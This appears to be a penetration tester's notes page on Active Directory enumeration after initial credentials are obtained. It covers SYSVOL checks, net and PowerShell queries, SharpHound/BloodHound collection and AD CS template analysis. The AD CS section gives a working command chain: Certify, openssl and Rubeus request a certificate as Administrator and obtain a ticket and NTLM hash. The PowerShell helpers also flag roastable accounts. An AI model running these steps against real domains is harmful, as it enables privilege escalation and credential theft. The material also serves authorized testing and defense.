Enumerate Active Directory
Enumeration steps to run after initial credentials have been obtained
SYSVOL
- On Windows, use `runas` with `/netonly` to start a shell whose network authentication uses the domain credentials (the process itself still runs as the local user; no local administrative rights are gained):
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
- `/netonly` does not verify the password at launch, so check the validity of the credentials against `SYSVOL`. It stores the Group Policy Objects (GPOs), and every authenticated domain account has read access, so a successful directory listing confirms that the credentials work.
- If the host is not domain joined, point DNS at the DC first so that domain names (and therefore Kerberos SPNs) resolve:
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth (the SMB client derives the SPN `cifs/<hostname>` from the name)
dir \\%HOSTNAME%\SYSVOL\
* Check `SYSVOL` via the `IP` address to force `NTLM` authentication (no SPN can be built from a bare IP, so Kerberos is skipped). If the IP path fails while the hostname path works, NTLM is probably restricted in the domain
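The credential check above, wrapped into a PowerShell function. This is an added example and not code from the original page: it lists `SYSVOL` by hostname and by IP and then inspects the ticket cache of the current logon session to tell whether the hostname access really used Kerberos or silently fell back to NTLM. It assumes a reachable DC and a shell started with `runas /netonly`; `dc01.example.com` and `10.0.0.5` are placeholders.

```powershell
# Added example (not from the original page). Run inside the runas /netonly shell.
# Assumptions: DcHostname resolves (DNS pointed at the DC), DcIp is that DC's address.
function Test-SysvolAccess {
    param(
        [Parameter(Mandatory)][string]$DcHostname,   # e.g. dc01.example.com (placeholder)
        [Parameter(Mandatory)][string]$DcIp          # e.g. 10.0.0.5 (placeholder)
    )

    $result = [ordered]@{
        ByHostname     = $false   # listing via \\hostname\SYSVOL succeeded
        ByIp           = $false   # listing via \\ip\SYSVOL succeeded (NTLM)
        KerberosTicket = $false   # a cifs/<hostname> service ticket is cached
        Error          = $null    # first error message, e.g. bad password
    }

    # Hostname path: the SMB client builds the SPN cifs/<hostname>, so Kerberos is
    # tried first and NTLM is only used if the Kerberos exchange fails.
    try {
        Get-ChildItem -Path "\\$DcHostname\SYSVOL" -ErrorAction Stop | Out-Null
        $result.ByHostname = $true
    } catch {
        $result.Error = $_.Exception.Message
    }

    # IP path: no SPN can be derived from a bare IP on a default client, so this
    # exchange is NTLM. Failure here with a working hostname path points at NTLM
    # being restricted rather than at bad credentials.
    try {
        Get-ChildItem -Path "\\$DcIp\SYSVOL" -ErrorAction Stop | Out-Null
        $result.ByIp = $true
    } catch {
        if (-not $result.Error) { $result.Error = $_.Exception.Message }
    }

    # klist shows the ticket cache of the current logon session. A runas /netonly
    # shell is its own logon session, so a cifs/<dc> ticket here proves that the
    # hostname access above was authenticated with Kerberos, not NTLM fallback.
    $tickets = & klist.exe 2>$null
    if ($tickets -match "cifs/$([regex]::Escape($DcHostname))") {
        $result.KerberosTicket = $true
    }

    [pscustomobject]$result
}

# Usage with placeholder values:
Test-SysvolAccess -DcHostname 'dc01.example.com' -DcIp '10.0.0.5'
```

Read the result as a pair: `ByHostname` true with `KerberosTicket` false means the name-based access worked but only over NTLM (usually DNS or SPN trouble, or a clock skew larger than five minutes), and `Error` containing "user name or password is incorrect" means the `/netonly` credentials were never valid in the first place.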
Microsoft Management Console (MMC)
- Use the AD snap-ins of the Remote Server Administration Tools (RSAT)
- Install: Start -> Apps & Features -> Manage Optional Features -> Add a feature -> search `RSAT` -> select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install
- Start the console from the `runas /netonly` shell so the snap-ins use the domain credentials: Win+R -> `MMC` -> File -> Add/Remove Snap-in -> add the three AD snap-ins (`Active Directory Users and Computers`, `Active Directory Domains and Trusts`, `Active Directory Sites and Services`)
- Right click `Active Directory Sites and Services` -> Change Forest -> add the root domain
- Right click `Active Directory Users and Computers` -> Change Domain -> enter the root domain
- Right click `Active Directory Users and Computers` -> View -> Advanced Features
- Start enumerating by clicking the domain object in the tree on the left
- Take a look at the `People` OU -> right click on objects to see their properties. Users can be changed or created and group memberships edited from here as well, given write permissions; these are modifications, not enumeration, and are logged on the DC when directory-change auditing is enabled
CMD enumeration
Execute the following commands from any domain-joined machine (or a `runas /netonly` shell) after initial access has been obtained. The `/domain` switch queries a DC of the logon domain instead of the local SAM.
Specific user
net user <username> /domain
Accounts & Groups
net user /domain
net group /domain
Specific groups like admins
net group <groupname> /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
For local admin accounts:
net localgroup administrators
Password Policy via accounts
net accounts /domain
Machines on the network (relies on the Computer Browser service and is often empty on current networks; `Get-ADComputer` below is the reliable source):
net view
Shares on specific remote systems:
net view \\$SERVER_NAME /all
Domain controllers of a domain, then the trusts of the current domain (trusted domains are the next targets for enumeration):
nltest /dclist:<domain>
nltest /domain_trusts
PowerShell Cmdlets (ActiveDirectory module, installed with RSAT; `-Server` selects the DC or domain to query)
User details via:
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
Groups:
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
Group membership:
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
Admin group members:
Get-ADGroupMember "Domain Admins"
Generic AD objects (the filter is a PowerShell expression string, see the next example; deleted objects are only returned if the AD Recycle Bin is enabled):
Get-ADObject -Filter <filterstuff> -IncludeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
Domains:
Get-ADDomain -Server exampleDC.com
All computer accounts joined to the domain:
Get-ADComputer -Filter *
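The cmdlets above return raw objects; the next step a practitioner takes is to sort the user accounts into the findings that matter first (Kerberoastable, AS-REP roastable, protected-group history, weak password settings). The following is an added example, not code from the original page: the function is pure over the objects it receives, so it runs offline on the constructed sample at the end, and the live `Get-ADUser` call that feeds it is shown as a comment. Property names are the ActiveDirectory module's; the sample account names and values are made up.

```powershell
# Added example (not from the original page). Classifies Get-ADUser output into the
# findings an attacker looks for first. Works on any objects with these properties.
function Find-InterestingAdAccount {
    param(
        [Parameter(Mandatory, ValueFromPipeline)][object[]]$User,
        [int]$StalePasswordDays = 365
    )
    begin { $cutoff = (Get-Date).AddDays(-$StalePasswordDays) }
    process {
        foreach ($u in $User) {
            if (-not $u.Enabled) { continue }   # disabled accounts cannot authenticate
            $findings = @()
            # Kerberoastable: any SPN on a user account lets every domain user request
            # a service ticket encrypted with that account's password hash. krbtgt is
            # skipped: its hash is not crackable in practice.
            $spn = @($u.ServicePrincipalName | Where-Object { $_ })
            if ($spn.Count -gt 0 -and $u.SamAccountName -ne 'krbtgt') { $findings += 'Kerberoastable' }
            # AS-REP roastable: without pre-authentication an AS-REP encrypted with the
            # user's key can be obtained without knowing the password.
            if ($u.DoesNotRequirePreAuth) { $findings += 'ASREPRoastable' }
            # adminCount=1 marks current or former members of protected groups
            # (AdminSDHolder); former members keep the flag and the restricted ACL.
            if ($u.adminCount -eq 1) { $findings += 'AdminCount' }
            if ($u.PasswordNotRequired) { $findings += 'PasswordNotRequired' }
            if ($u.PasswordNeverExpires) { $findings += 'PasswordNeverExpires' }
            if ($u.PasswordLastSet -and $u.PasswordLastSet -lt $cutoff) { $findings += 'StalePassword' }
            if ($findings) {
                [pscustomobject]@{ SamAccountName = $u.SamAccountName; Findings = ($findings -join ',') }
            }
        }
    }
}

# Constructed sample objects (no domain needed); shapes mirror Get-ADUser output.
function New-SampleUser {
    param($Name, [bool]$Enabled = $true, [string[]]$Spn = @(), [bool]$NoPreAuth = $false,
          $AdminCount = $null, [bool]$PwdNotRequired = $false, [bool]$PwdNeverExpires = $false,
          [datetime]$PwdLastSet = (Get-Date))
    [pscustomobject]@{
        SamAccountName = $Name; Enabled = $Enabled; ServicePrincipalName = $Spn
        DoesNotRequirePreAuth = $NoPreAuth; adminCount = $AdminCount
        PasswordNotRequired = $PwdNotRequired; PasswordNeverExpires = $PwdNeverExpires
        PasswordLastSet = $PwdLastSet
    }
}
$sample = @(
    (New-SampleUser -Name 'svc_sql' -Spn 'MSSQLSvc/sql01.example.com:1433' -PwdNeverExpires $true -PwdLastSet (Get-Date).AddYears(-3))
    (New-SampleUser -Name 'jdoe' -NoPreAuth $true -PwdLastSet (Get-Date).AddDays(-10))
    (New-SampleUser -Name 'old_admin' -Enabled $false -AdminCount 1 -PwdLastSet (Get-Date).AddYears(-5))
    (New-SampleUser -Name 'svc_backup' -PwdNotRequired $true -AdminCount 1)
)
$sample | Find-InterestingAdAccount

# Live (ActiveDirectory module; dc01.example.com is a placeholder):
# Get-ADUser -Filter * -Server dc01.example.com -Properties ServicePrincipalName,DoesNotRequirePreAuth,adminCount,PasswordNotRequired,PasswordNeverExpires,PasswordLastSet |
#     Find-InterestingAdAccount
```

The sample is built so that each rule fires once: a stale service account with an SPN, a user without pre-authentication, a disabled former admin that must be skipped despite `adminCount=1`, and an enabled account with `PasswordNotRequired`. Accounts flagged `Kerberoastable` here are the same ones BloodHound lists under its Kerberoastable query.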
Sharphound and Bloodhound
- Change to the AD user via `runas.exe` and collect with one of the following:
* Sharphound.ps1
* sharphound.exe
* Azurehound.ps1
- For example (`--ExcludeDCs` keeps the collector from touching the DCs for session and local-group enumeration, which lowers the noise on the most monitored hosts)
Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
- After some time, collect the current sessions again; sessions are point-in-time data, so repeated collections over a working day give far better coverage than a single run
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
- Start the neo4j db
neo4j console
- Start BloodHound
bloodhound --no-sandbox
- Drag and drop the zip file produced by Sharphound into the BloodHound window
- Either search for AD objects and use `Analysis` to find an attack path through the info on the edges
- The `Analysis` tab also lists exploitable accounts, for example Kerberoastable accounts
LDAP
PowerView
Registered Machines in the domain
Get-NetComputer | select "name"
When the computers were added to the domain and who owns the computer object (ActiveDirectory module via the `AD:` drive, not PowerView; a regular user who joined the machine usually ends up as owner and therefore has implicit rights over the object):
Get-ADComputer -Filter * -Properties whenCreated | Select-Object Name,@{n="Owner";e={(Get-Acl "AD:\$($_.DistinguishedName)").Owner}},whenCreated
WMI
Find Certificates and Private Keys
Active Directory Certificate Services (AD CS) can be enumerated with the Certify tool.
- Enumerate templates the current user can abuse via Certify, then use the `FullName` (`<CA host>\<CA name>`) from the first step's output as the `/ca:` value of the second step. The request below asks for a certificate with an alternative name (`/altname`), which only succeeds on a template that lets the enrollee supply the subject and allows client authentication
Certify.exe find /vulnerable /currentuser
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
- Copy the returned private key and certificate into `cert.pem` and convert them as mentioned in the last line of the output, for example
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
- Get a ticket with the loot via Rubeus (PKINIT). `/getcredentials` additionally recovers the account's NTLM hash via U2U; add `/ptt` to inject the ticket into the current session and `/password:` if the PFX was exported with one
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
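What `Certify.exe find /vulnerable` decides for the misconfiguration the request above exploits (ESC1 in the SpecterOps "Certified Pre-Owned" naming: enrollee supplies the subject, client authentication allowed, no approval or signature gate) can be reproduced from the template attributes in the Configuration partition. The following is an added example, not code from the page or from Certify: the check is pure over template objects, so it runs offline on the constructed sample, and the live LDAP retrieval is shown as a comment. Attribute and flag names are the real AD CS schema names; template and CA names in the sample are made up, and the function deliberately does not evaluate the template ACL, so enrollment rights still have to be confirmed.

```powershell
# Added example (not from the original page or Certify). Attribute names are the AD CS
# schema names; sample template names and values are constructed for the example.

# EKUs that allow the certificate to authenticate a user; an empty EKU list is "any purpose".
$ClientAuthEku = @(
    '1.3.6.1.5.5.7.3.2',       # Client Authentication
    '1.3.6.1.4.1.311.20.2.2',  # Smart Card Logon
    '1.3.6.1.5.2.3.4',         # PKINIT Client Authentication
    '2.5.29.37.0'              # Any Purpose
)
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # bit in msPKI-Enrollment-Flag: manager approval

function Get-Esc1Template {
    param(
        [Parameter(Mandatory)][object[]]$Template,           # pKICertificateTemplate objects
        [Parameter(Mandatory)][string[]]$PublishedTemplate   # certificateTemplates of the CA(s)
    )
    foreach ($t in $Template) {
        # A template no CA publishes cannot be requested anywhere.
        if ($PublishedTemplate -notcontains $t.Name) { continue }
        # The requester must be allowed to put an arbitrary subject/SAN into the CSR.
        if (-not ($t.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)) { continue }
        # Manager approval or required RA signatures stop unattended issuance.
        if ($t.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) { continue }
        if ($t.'msPKI-RA-Signature' -gt 0) { continue }
        # The certificate must be usable for logon (PKINIT) as the spoofed identity.
        $eku = @($t.'pKIExtendedKeyUsage' | Where-Object { $_ })
        $clientAuth = ($eku.Count -eq 0) -or [bool]($eku | Where-Object { $ClientAuthEku -contains $_ })
        if (-not $clientAuth) { continue }
        [pscustomobject]@{ Template = $t.Name; Eku = ($eku -join ',') }
    }
}

# Constructed sample templates. The values on 'User' mirror the built-in template, whose
# subject is built from AD (low bit of the name flag clear), so it must not be reported.
function New-SampleTemplate {
    param($Name, [string[]]$Eku, [int]$NameFlag, [int]$EnrollFlag = 0, [int]$RaSig = 0)
    [pscustomobject]@{
        Name = $Name; 'pKIExtendedKeyUsage' = $Eku
        'msPKI-Certificate-Name-Flag' = $NameFlag
        'msPKI-Enrollment-Flag' = $EnrollFlag; 'msPKI-RA-Signature' = $RaSig
    }
}
$sampleTemplates = @(
    (New-SampleTemplate -Name 'UserAuthentication' -Eku '1.3.6.1.5.5.7.3.2' -NameFlag 1)
    (New-SampleTemplate -Name 'User' -Eku '1.3.6.1.5.5.7.3.2','1.3.6.1.5.5.7.3.4' -NameFlag (-1509949440) -EnrollFlag 41)
    (New-SampleTemplate -Name 'WebServer' -Eku '1.3.6.1.5.5.7.3.1' -NameFlag 1)
    (New-SampleTemplate -Name 'ApprovedUser' -Eku '1.3.6.1.5.5.7.3.2' -NameFlag 1 -EnrollFlag 2)
    (New-SampleTemplate -Name 'Unpublished' -Eku @() -NameFlag 1)
)
Get-Esc1Template -Template $sampleTemplates -PublishedTemplate 'UserAuthentication','User','WebServer','ApprovedUser'

# Live (ActiveDirectory module, any domain user can read these objects):
# $cfg = (Get-ADRootDSE).configurationNamingContext
# $tpl = Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,$cfg" `
#     -LDAPFilter '(objectClass=pKICertificateTemplate)' `
#     -Properties Name,pKIExtendedKeyUsage,msPKI-Certificate-Name-Flag,msPKI-Enrollment-Flag,msPKI-RA-Signature
# $pub = Get-ADObject -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,$cfg" `
#     -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates |
#     ForEach-Object certificateTemplates
# Get-Esc1Template -Template $tpl -PublishedTemplate $pub
```

Each sample entry exercises one gate: `WebServer` lacks a client-authentication EKU, `ApprovedUser` requires manager approval, `Unpublished` is not offered by any CA, and `User` does not let the enrollee supply the subject. A template that passes all four gates is only exploitable if a group the current user belongs to holds the `Certificate-Enrollment` extended right (`0e10c968-78fb-11d2-90d4-00c04f79dc55`) or a generic-all/write right on the template object, which is the part Certify's `/currentuser` switch resolves and this function leaves to a separate `Get-Acl "AD:\<template DN>"` check.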